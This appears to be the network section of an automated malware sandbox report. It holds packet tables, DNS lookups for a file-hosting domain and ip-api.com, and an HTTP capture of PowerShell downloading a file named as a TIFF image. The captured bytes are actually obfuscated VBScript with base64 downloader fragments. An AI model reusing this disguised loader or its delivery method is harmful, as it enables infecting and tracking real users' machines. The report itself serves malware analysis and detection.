Nov 20, 2024 08:28:29.096366882 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.096376896 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096388102 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096390963 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.096400023 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096421003 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096424103 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.096434116 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096445084 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096456051 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.096461058 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096474886 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.097327948 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.097340107 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.097353935 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.097371101 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.097393036 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.097413063 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.097426891 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.097456932 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115084887 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115123987 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115134954 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115155935 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115166903 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115179062 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115195990 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115355968 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115381002 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115392923 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115406036 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115421057 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115425110 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115433931 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115458965 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115700006 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115710974 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115719080 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115745068 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115767002 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115818977 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115829945 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115843058 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115854025 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115865946 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115870953 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115878105 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115885973 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115890026 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115901947 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115911961 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115917921 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115932941 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.115932941 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.115967989 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.116678953 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.116692066 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.116707087 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.116720915 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.116730928 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.116755962 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.136890888 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.136910915 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.136924028 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.136955976 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.136974096 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.136986017 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.136997938 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.137010098 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.137022018 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.137037039 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.137114048 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.180649042 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.180687904 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.180699110 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.180716991 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.180730104 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.180741072 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.180742025 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.180752993 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.180771112 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.180772066 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.180794001 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.180814981 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.181088924 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181123972 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181135893 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181159019 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.181298971 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181327105 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181339025 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181340933 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.181353092 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181382895 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.181535959 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181576967 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.181637049 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181648016 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181660891 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181675911 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181687117 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181698084 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181706905 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.181711912 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181718111 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.181756020 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.182200909 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182213068 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182226896 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182243109 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.182246923 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182257891 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182271957 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182281017 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.182286024 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182311058 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.182322979 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182334900 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182347059 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182358027 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182359934 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.182370901 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182383060 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.182384014 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.182409048 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.183155060 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183181047 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183197975 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183202982 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.183209896 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183223009 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183229923 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.183233976 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183245897 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183259964 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.183262110 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183274031 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183283091 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.183285952 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183300972 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183307886 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.183325052 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183335066 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.183337927 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.183374882 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.184196949 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184210062 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184222937 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184233904 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184243917 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.184246063 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184271097 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184274912 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.184284925 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184295893 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184308052 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184312105 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.184319019 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184330940 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184333086 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.184344053 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184356928 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.184360027 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.184381962 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.185044050 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.185086966 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.185147047 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.185158968 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.185170889 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.185182095 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.185194016 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.185194969 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.185206890 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.185213089 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.185225010 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.185241938 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201344967 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201397896 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201416016 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201428890 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201441050 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201452017 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201462984 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201463938 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201482058 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201486111 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201494932 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201508045 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201517105 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201553106 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201584101 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201594114 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201605082 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201617956 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201622963 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201653957 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201756001 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201766968 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201778889 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201788902 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201792955 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201802015 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201817989 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201822042 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201836109 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.201895952 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.201989889 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202028036 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.202037096 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202049971 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202060938 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202081919 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.202208042 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202225924 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202239037 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202244997 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.202249050 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202265978 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202270985 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.202300072 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.202347040 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202426910 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202442884 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202454090 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202465057 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202488899 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.202488899 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.202495098 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.202526093 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.223062038 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.223083019 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.223105907 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.223118067 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.223123074 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.223129988 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.223144054 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.223155022 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.223155975 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.223166943 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.223175049 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.223210096 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.266908884 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.266937017 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.266947031 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.266958952 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.266973019 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.266984940 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.266994953 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.267034054 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.267041922 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.267066956 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.267081022 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.267091990 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.267100096 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.267132044 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.315978050 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.557179928 CET	54446	80	192.168.2.6	208.95.112.1
Nov 20, 2024 08:28:29.562167883 CET	80	54446	208.95.112.1	192.168.2.6
Nov 20, 2024 08:28:29.562253952 CET	54446	80	192.168.2.6	208.95.112.1
Nov 20, 2024 08:28:29.562482119 CET	54446	80	192.168.2.6	208.95.112.1
Nov 20, 2024 08:28:29.567281961 CET	80	54446	208.95.112.1	192.168.2.6
Nov 20, 2024 08:28:30.026309967 CET	80	54446	208.95.112.1	192.168.2.6
Nov 20, 2024 08:28:30.067848921 CET	54446	80	192.168.2.6	208.95.112.1
Nov 20, 2024 08:29:50.548505068 CET	80	54446	208.95.112.1	192.168.2.6
Nov 20, 2024 08:29:50.548763037 CET	54446	80	192.168.2.6	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 08:28:10.519165039 CET	52710	53	192.168.2.6	1.1.1.1
Nov 20, 2024 08:28:10.530880928 CET	53	52710	1.1.1.1	192.168.2.6
Nov 20, 2024 08:28:18.231113911 CET	53	53434	1.1.1.1	192.168.2.6
Nov 20, 2024 08:28:29.543334961 CET	65256	53	192.168.2.6	1.1.1.1
Nov 20, 2024 08:28:29.551024914 CET	53	65256	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 08:28:10.519165039 CET	192.168.2.6	1.1.1.1	0x4c53	Standard query (0)	1017.filemail.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 08:28:29.543334961 CET	192.168.2.6	1.1.1.1	0x6668	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 08:28:10.530880928 CET	1.1.1.1	192.168.2.6	0x4c53	No error (0)	1017.filemail.com	ip.1017.filemail.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 08:28:10.530880928 CET	1.1.1.1	192.168.2.6	0x4c53	No error (0)	ip.1017.filemail.com		142.215.209.78	A (IP address)	IN (0x0001)	false
Nov 20, 2024 08:28:29.551024914 CET	1.1.1.1	192.168.2.6	0x6668	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

1017.filemail.com

192.3.22.13

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	192.3.22.13	80	4176	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 08:28:05.003329992 CET	338	OUT	GET /xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 192.3.22.13 Connection: Keep-Alive
Nov 20, 2024 08:28:05.607850075 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 07:28:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 19 Nov 2024 09:31:08 GMT ETag: "22b12-62740b16a747a" Accept-Ranges: bytes Content-Length: 142098 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 64 00 65 00 73 00 63 00 61 00 62 00 69 00 64 00 6f 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 65 00 73 00 70 00 69 00 6e 00 65 00 74 00 61 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 6d 00 61 00 6c 00 68 00 61 00 64 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 6f 00 6e 00 75 00 62 00 69 00 61 00 6c 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 64 00 65 00 73 00 63 00 6f 00 61 00 6c 00 68 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 65 00 73 00 63 00 6f 00 61 00 6c 00 68 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 65 00 73 00 70 00 69 00 6e 00 65 00 74 00 61 00 2c 00 20 00 6d 00 61 00 6c 00 68 00 61 00 64 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 64 00 65 00 73 00 63 00 6f 00 61 00 6c 00 68 00 6f 00 20 00 3e 00 20 00 30 00 0d 00 0a 00 20 00 20 00 [TRUNCATED] Data Ascii: Function descabido(ByVal espineta, ByVal malhado, ByVal conubial) Dim descoalho descoalho = InStr(espineta, malhado) Do While descoalho > 0 espineta = Left(espineta, descoalho - 1) & conubial & Mid(espineta, descoalho + Len(malhado)) descoalho = InStr(descoalho + Len(conubial), espineta, malhado) Loop descabido = espinetaEnd Functionprivate function ReadStdIn() while Not stdIn.AtEndOfS
Nov 20, 2024 08:28:05.607914925 CET	1236	IN	Data Raw: 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 20 00 3d 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 20 00 26 00 20 00 73 00 74 Data Ascii: tream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not iodar() Then
Nov 20, 2024 08:28:05.607952118 CET	1236	IN	Data Raw: 00 6c 00 59 00 6b 00 4e 00 73 00 61 00 57 00 56 00 75 00 64 00 43 00 63 00 72 00 4a 00 79 00 35 00 45 00 62 00 33 00 63 00 6e 00 4b 00 79 00 64 00 75 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 62 Data Ascii: lYkNsaWVudCcrJy5Eb3cnKyduGZYVWJSALIPUXNQbG9hZERhdGEoRHAzaW1hZycrJ2VVGZYVWJSALIPUXNQcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeX
Nov 20, 2024 08:28:05.607970953 CET	1236	IN	Data Raw: 00 6e 00 64 00 43 00 42 00 45 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 63 00 44 00 4e 00 7a 00 64 00 47 00 46 00 79 00 64 00 45 00 6c 00 75 00 5a 00 47 00 56 00 34 00 4f 00 30 00 52 00 77 00 4d Data Ascii: ndCBEGZYVWJSALIPUXNQcDNzdGFydEluZGV4O0RwM3N0YX" ocluso = ocluso & "J0SW5kZXggKGZYVWJSALIPUXNQz0gRHAzc3RhcnQnKydG
